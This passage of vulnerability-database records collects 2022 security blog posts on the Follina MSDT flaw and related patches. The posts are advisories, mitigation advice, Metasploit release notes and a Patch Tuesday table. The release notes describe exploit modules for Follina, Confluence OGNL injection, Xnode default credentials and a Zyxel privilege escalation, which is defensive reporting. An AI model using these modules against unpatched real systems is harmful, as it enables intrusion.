Microsoft patches Follina, and many other security updates](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/update-now-microsoft-patches-follina-and-many-other-security-updates/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:17:05", "type": "malwarebytes", "title": "Update now!\u00a0 Microsoft patches Follina, and many other security updates", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26937", "CVE-2022-30136", "CVE-2022-30139", "CVE-2022-30163", "CVE-2022-30190"], "modified": "2022-06-15T13:17:05", "id": "MALWAREBYTES:0647495F01C9F1847B118A9E32BC6C13", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/update-now-microsoft-patches-follina-and-many-other-security-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "schneier": [{"lastseen": "2022-06-02T16:47:30", "description": "Researchers have 
[reported](<https://arstechnica.com/information-technology/2022/05/code-execution-0day-in-windows-has-been-under-active-exploit-for-7-weeks/>) a still-unpatched Windows zero-day that is currently being exploited in the wild.\n\nHere's the [advisory](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>), which includes a work-around until a patch is available.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T18:25:36", "type": "schneier", "title": "Clever \u2014 and Exploitable \u2014 Windows Zero-Day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T18:25:36", "id": "SCHNEIER:FECDA04283F9CFE2D14C1550420A1804", "href": "https://www.schneier.com/blog/archives/2022/06/clever-and-exploitable-windows-zero-day.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-06-02T16:48:36", "description": "\n\nOn May 30, 2022, Microsoft Security Response Center (MSRC) [published a 
blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on CVE-2022-30190, an unpatched vulnerability in the Microsoft Support Diagnostic Tool (msdt) in Windows. Microsoft\u2019s [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>) on CVE-2022-30190 indicates that exploitation has been detected in the wild.\n\nAccording to Microsoft, CVE-2022-30190 is a remote code execution vulnerability that exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights. Workarounds are available in [Microsoft\u2019s blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\nRapid7\u2019s vulnerability research team has a [full technical analysis of CVE-2022-30190 in AttackerKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis?referrer=blog>). The flaw requires user interaction to exploit, looks similar to many other vulnerabilities that necessitate a user opening or previewing an attachment, and appears to leverage a vector [described in 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>). 
Despite the description, it is not a true \u201cremote code execution\u201d vulnerability.\n\n## Mitigation guidance\n\nIn the absence of a patch, disable the MSDT URL protocol [as specified in Microsoft\u2019s advisory](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-30190 with an authenticated vulnerability check in the May 31 content release.\n\nInsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability:\n\n * Suspicious Process - Microsoft Office App Spawns MSDT.exe\n\nWe recommend that you review your settings for this detection rule and confirm it is turned on and [set to an appropriate rule action and priority for your organization](<https://docs.rapid7.com/insightidr/modify-detection-rules>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T15:15:16", "type": "rapid7blog", "title": "CVE-2022-30190: \"Follina\" Microsoft Support Diagnostic Tool Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T15:15:16", "id": "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "href": "https://blog.rapid7.com/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>))and Windows CVE-2022-30190 ([AttackKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using github), we track milestones as well. 
This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>)\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.\n * 
[#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-13T15:56:19", "description": "## ICPR Certificate Management\n\n\n\nThis week Metasploit has a new ICPR Certificate Management module from [Oliver Lyak](<https://github.com/ly4k>) and our very own [Spencer McIntyre](<https://github.com/zeroSteiner>), which can be utilized for issuing certificates via Active Directory Certificate Services. 
Issuing certificates is useful in a few contexts, including persistence, [ESC1](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) and as a primitive needed to exploit [CVE-2022-26923](<https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html>). The resulting PFX certificate file is stored to loot and is encrypted using a blank password.\n\n## ManageEngine ADAudit Plus and DataSecurity Plus Xnode enum\n\nAnother addition, thanks to [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), brings two new `auxiliary/gather` modules and docs that take advantage of default Xnode credentials ([CVE-2020\u201311532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532>)) in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server (Xnode). Because both modules rely on the same code to interact with Xnode, this change also adds a mixin at `lib/msf/core/auxiliary/manageengine_xnode` that is leveraged by both modules (plus by a third module that will be part of a separate PR). Both modules also come with configuration files to determine what data will be enumerated from Xnode. The [PR](<https://github.com/rapid7/metasploit-framework/pull/16725>) contains even more information on the vulnerable systems and extensive notes!\n\n## New module content (5)\n\n * [ICPR Certificate Management](<https://github.com/rapid7/metasploit-framework/pull/16939>) by [Oliver Lyak](<https://github.com/ly4k>) and [Spencer McIntyre](<https://github.com/zeroSteiner>) \\- This adds a module for issuing certificates via Active Directory Certificate Services, which is useful in a few contexts including persistence and for some specific exploits. 
The resulting PFX certificate file is stored to the loot and is encrypted using a blank password.\n\n * [ManageEngine ADAudit Plus Xnode Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16725>) by [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), which exploits [CVE-2020-11532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532?referrer=blog>) \\- Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, aka CVE-2020\u201311532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.\n\n * [ManageEngine DataSecurity Plus Xnode Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16725>) by [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), which exploits [CVE-2020-11532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532?referrer=blog>) \\- Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, a.k.a CVE-2020\u201311532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.\n\n * [Zyxel Firewall SUID Binary Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/16786>) by [jbaines-r7](<https://github.com/jbaines-r7>), which exploits [CVE-2022-30526](<https://attackerkb.com/topics/q8X8Km59iU/cve-2022-30526?referrer=blog>) \\- This adds an LPE exploit for Zyxel Firewalls that can allow a user to escalate themselves to root. 
The vulnerability is identified as CVE-2022-30526 and is due to a suid binary that allows any user to copy files with root permissions.\n\n * [CVE-2022-30190 AKA Follina](<https://github.com/rapid7/metasploit-framework/pull/16734>) by [bwatters-r7](<https://github.com/bwatters-r7>) \\- This updates the exploit for CVE-2022-30190 (A.K.A Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer's preview tab without needing user interaction to enable editing functionality.\n\n## Enhancements and features (4)\n\n * [#16746](<https://github.com/rapid7/metasploit-framework/pull/16746>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates the MSSQL login scanner to catch exceptions and continue running.\n\n * [#16900](<https://github.com/rapid7/metasploit-framework/pull/16900>) from [bcoles](<https://github.com/bcoles>) \\- This adds a new `#kill_process` method that supports shell, PowerShell, and Meterpreter sessions on different platforms.\n\n * [#16903](<https://github.com/rapid7/metasploit-framework/pull/16903>) from [bcoles](<https://github.com/bcoles>) \\- This cleans up the enum_shares post modules and adds support for shell sessions.\n\n * [#16959](<https://github.com/rapid7/metasploit-framework/pull/16959>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `time` command has been updated with the `--cpu` and `--memory` profiler options to allow users to get memory and CPU usage profiles when running a command inside `msfconsole`.\n\n## Bugs fixed (5)\n\n * [#16750](<https://github.com/rapid7/metasploit-framework/pull/16750>) from [bojanisc](<https://github.com/bojanisc>) \\- This updates the `exploit/multi/http/jenkins_script_console` module to use the decoder from the `java.util.Base64` class in place of the now-deprecated decoder from the `sun.misc.BASE64Decoder` class, enabling exploitation of newer 
Jenkins versions.\n\n * [#16869](<https://github.com/rapid7/metasploit-framework/pull/16869>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `file_remote_digestmd5()` and `file_remote_digestsha1()` methods where `read_file()` would return an error message instead of the remote file contents. Additionally, the `file_remote_digest*` methods now support more session types, and they have a new `util` option that allows the user to perform the hashing on the remote host instead of downloading the remote file and performing the hashing locally.\n\n * [#16918](<https://github.com/rapid7/metasploit-framework/pull/16918>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- A bug has been fixed in the module for CVE-2022-30333 whereby if the server responded with a 200 OK response, the module would keep trying to trigger the payload. This would lead to multiple sessions being returned when only one was desired.\n\n * [#16920](<https://github.com/rapid7/metasploit-framework/pull/16920>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A typo has been fixed in _msfvenom that prevented ZSH autocompletion from working when using the `--arch` argument with `msfvenom`.\n\n * [#16955](<https://github.com/rapid7/metasploit-framework/pull/16955>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fixes an issue in the LDAP query module that would cause issues if the user queried for a field that was populated with binary data.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.2.14...6.2.15][prs-landed]\n * [Full diff 6.2.14...6.2.15][diff]\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo][repo](master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers][nightly] or the\n\n[binary 
installers][binary](which also include the commercial edition). \n[binary]: <https://www.rapid7.com/products/metasploit/download.jsp> \n[diff]: <https://github.com/rapid7/metasploit-framework/compare/6.2.14...6.2.15> \n[prs-landed]: [https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:"2022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00"](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00%22>) \n[nightly]: <https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers> \n[repo]: <https://github.com/rapid7/metasploit-framework>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-02T19:39:21", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11532", "CVE-2022-26923", "CVE-2022-30190", "CVE-2022-30333", "CVE-2022-30526"], "modified": "2022-09-02T19:39:21", "id": "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "href": "https://blog.rapid7.com/2022/09/02/metasploit-weekly-wrap-up-174/", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T00:04:15", "description": "\n\nIt's the week of [Hacker Summer Camp](<https://www.rapid7.com/blog/post/2022/08/04/what-were-looking-forward-to-at-black-hat-def-con-and-bsideslv-2022/>) in Las Vegas, and Microsoft has [published](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) fixes for 141 separate vulnerabilities in their swath of August updates. This is a new monthly record by raw CVE count, but from a patching perspective, the numbers are slightly less dire. 20 CVEs affect their Chromium-based Edge browser, and 34 affect Azure Site Recovery (up from 32 CVEs affecting that product last month). As usual, OS-level updates will address a lot of these, but note that some extra configuration is required to fully protect Exchange Server this month.\n\nThere is one 0-day being patched this month. [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713>) is a remote code execution (RCE) vulnerability affecting the Microsoft Windows Support Diagnostic Tool (MSDT) \u2013 it carries a CVSSv3 base score of 7.8, as it requires convincing a potential victim to open a malicious file. The advisory indicates that this CVE is a variant of the \u201cDogwalk\u201d vulnerability, which made news alongside [Follina](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>) (CVE-2022-30190) back in May.\n\nPublicly disclosed, but not (yet) exploited is [CVE-2022-30134](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30134>), an Information Disclosure vulnerability affecting Exchange Server. In this case, simply patching is not sufficient to protect against attackers being able to read targeted email messages. 
Administrators should [enable Extended Protection](<https://microsoft.github.io/CSS-Exchange/Security/Extended-Protection/>) in order to fully remediate this vulnerability, as well as [the](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21979>) [five](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21980>) [other](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24516>) [vulnerabilities](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24477>) [affecting](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34692>) Exchange this month. Details about how to accomplish this are available via the [Exchange Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\nMicrosoft also patched several flaws affecting Remote Access Server (RAS). The most severe of these ([CVE-2022-30133](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133>) and [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35744>)) are related to Windows Point-to-Point Tunneling Protocol and could allow RCE simply by sending a malicious connection request to a server. Seven CVEs affecting the Windows Secure Socket Tunneling Protocol (SSTP) on RAS were also fixed this month: six RCEs and one Denial of Service. If you have RAS in your environment but are unable to patch immediately, consider blocking traffic on port 1723 from your network.\n\nVulnerabilities affecting Windows Network File System (NFS) have been trending in recent months, and today sees Microsoft patching [CVE-2022-34715](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34715>) (RCE, CVSS 9.8) affecting NFSv4.1 on Windows Server 2022.\n\nThis is the worst of it. 
One last vulnerability to highlight: [CVE-2022-35797](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35797>) is a Security Feature Bypass in [Windows Hello](<https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/windows-hello-face-authentication#external-camera-security>) \u2013 Microsoft\u2019s biometric authentication mechanism for Windows 10. Successful exploitation requires physical access to a system, but would allow an attacker to bypass a facial recognition check.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Azure vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-35802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35802>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-30175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30175>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30176>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34687>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35773](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35773>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35779](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35779>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35806>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 
7.8 | Yes \n[CVE-2022-35772](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35772>) | Azure Site Recovery Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-35824](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35824>) | Azure Site Recovery Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-33646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33646>) | Azure Batch Node Agent Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-35780](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35780>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35781](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35781>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35799](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35799>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35775](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35775>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35801](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35801>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35807>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35808>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35782](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35782>) | Azure Site Recovery Elevation of 
Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35809>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35784>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35810>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35811>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35785>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35786>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes 